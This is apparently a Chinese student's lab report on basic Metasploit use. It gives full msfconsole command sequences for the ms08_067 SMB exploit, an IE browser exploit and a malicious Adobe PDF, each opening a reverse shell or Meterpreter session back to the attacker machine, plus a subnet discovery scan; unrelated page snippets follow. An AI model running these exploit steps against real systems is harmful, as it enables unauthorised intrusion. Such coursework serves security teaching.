一、实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.一个主动攻击实践,如ms08_067; (成功)

2.一个针对浏览器的攻击,如ms10_018_ie_behaviors;(成功且唯一)

3. 一个针对客户端的攻击,如Adobe;(成功)

4.成功应用任何一个辅助模块。(成功)

二、实践过程

1.实现主动攻击,使用ms08_067漏洞

被攻击机:WindowsXP sp3.

(1)输入指令使用ms08_067漏洞攻击程序 use exploit/windows/smb/ms08_067_netapi

(2)配置参数

输入指令 set payload generic/shell_reverse_tcp(设置有效攻击载荷)

设置攻击机ip  set LHOST 192.168.1.234

设置攻击端口  set LPORT 4303

设置靶机ip  set RHOST 192.168.1.229

设置自动选择目标系统类型  set target 10

(3)设置完成后输入指令  exploit,可以看到,已经获得了xp的权限

2.实现针对浏览器的攻击,使用ms10_002漏洞

被攻击环境:WindowsXP sp2+ie 6.0

(1)使用指令 use exploit/windows/browser/ms10_018_ie_behaviors

    选择一个payload  set payloads windows/meterpreter/reverse_tcp

设置相关参数,

set LHOST 192.168.1.234攻击方IP;

     set LPORT 4303 攻击方端口;

set target 0

set URIPATH 4303js 资源标识符路径设置;

(3)输入指令 exploit 后,可以看到生成了名为http://192.168.1.234:8080/4303js 的链接

(4)在xp系统里访问链接  http://192.168.1.234:8080/4303js,此时IE卡死,崩溃

(5)输入指令 sessions -i 1 后,成功获取到xp的cmd

3.实现针对客户端的攻击

被攻击环境:WindowsXP sp2+Adobe Readers 9.0

(1)输入指令 use windows/fileformat/adobe_cooltype_sing

(2)配置渗透攻击所需的配置项:

  设置载荷: set payload windows/meterpreter/reverse_tcp

  设置攻击机IP: set LHOST 192。168.1.234

  设置端口: set LPORT 4303

  设置产生的文件: set FILENAME 4303.pdf

  设置完成后键入 exploit

(3)根据路径找到该pdf文件放到靶机里。(需要先设置,勾选显示隐藏文件,再进行寻找)

(4)使用命令 back 退出当前模块,启动一个对应于载荷的监听端,等待靶机回连

输入指令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.234
set lport

(5)在靶机中打开该pdf,回连成功

4 成功应用任何一个辅助模块。

使用ARP请求枚举本地局域网中所有活跃主机

输入指令: use auxiliary/scanner/discovery/udp_seep

show options
    将RHOSTS设置为 192.168.1.0/24,即扫描子网号为192.168.1.0的子网内的所有主机

可以看到目标主机的IP192.168.1.168在列表之中。

三、基础问题回答

用自己的话解释什么是exploit,payload,encode.

exploit就是执行攻击程序,利用漏洞对靶机进行相应的攻击;payload就是漏洞攻击的有效载荷,利用漏洞实现不同的攻击手段;encode就是编码器,就是对攻击进行伪装。

四、实验总结与体会

这次实验我认为主要看网,网不好虚拟机都下不下来。msf的功能固然强大,但攻击成功的前提是被攻击的主机存在我们需要的漏洞。如果我们能够重视计算机安全的保护,及时对软件和系统进行更新,修补漏洞,我们的电脑收到攻击的可能性会很低。

Exp5 MSF基础应用 20164303景圣的更多相关文章

  1. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

随机推荐

  1. App拉起小程序提示跳转失败

    App拉起小程序提示跳转失败 req.userName = "gh_8afldfalsejw"; // 小程序的原始ID,注意不是Appid

  2. php删除文件夹

    function deldir($dir) { $dh=opendir($dir); while ($file=readdir($dh)) { if($file!="." & ...

  3. LeetCode 96 - 不同的二叉搜索树 - [DP]

    假定 $f[n]$ 表示有 $n$ 个节点的二叉树,有多少种不同结构. 因此 $f[n] = \sum_{i=0}^{n-1} (f[i] \times f[n-1-i])$,选一个节点作为根节点,那 ...

  4. 第一次C语言实验

    [实验感受]第一次实验感觉什么都还没有记住就要写小程序了,有些小着急.现在才发现c语言就是要在实践中掌握的,多敲点代码,多犯错误,就会明白其中的规则. 实验一:输入一个数判断奇数还是偶数,现在想想其实 ...

  5. 可扩展的Web架构和分布式系统

    原文链接:http://www.aosabook.org/en/distsys.html 开源软件已经成为一些大型网站的基石.随着这些网站的发展,围绕其架构的最佳实践和指导原则应运而生.本章旨在讨论设 ...

  6. sql的基本语句

    SQL中的inner join, left join, right join, full join 创建两个测试表并且输入相关值create table test_a(aid int,aNum var ...

  7. LeetCode 13 Roman to Integer 解题报告

    题目要求 Roman numerals are represented by seven different symbols: I, V, X, L, C, Dand M. Symbol Value ...

  8. java中使用springmvc实现下载文件

    下载文件具体实现代码: public class TestDownload{ public HttpServletRequest request; public HttpServletResponse ...

  9. allegro17.2 错误记录

    1.网表导入PCB时出现如下错误::error with pin number 'P11'in device ' lfbga176'::Unable to find pin name in adfnc ...

  10. minikube windows hyperx填坑记

    minikube windows hyperx填坑记 安装了一天半,还是没行,先放弃 开始 minikube start --vm-driver=hyperv --hyperv-virtual-swi ...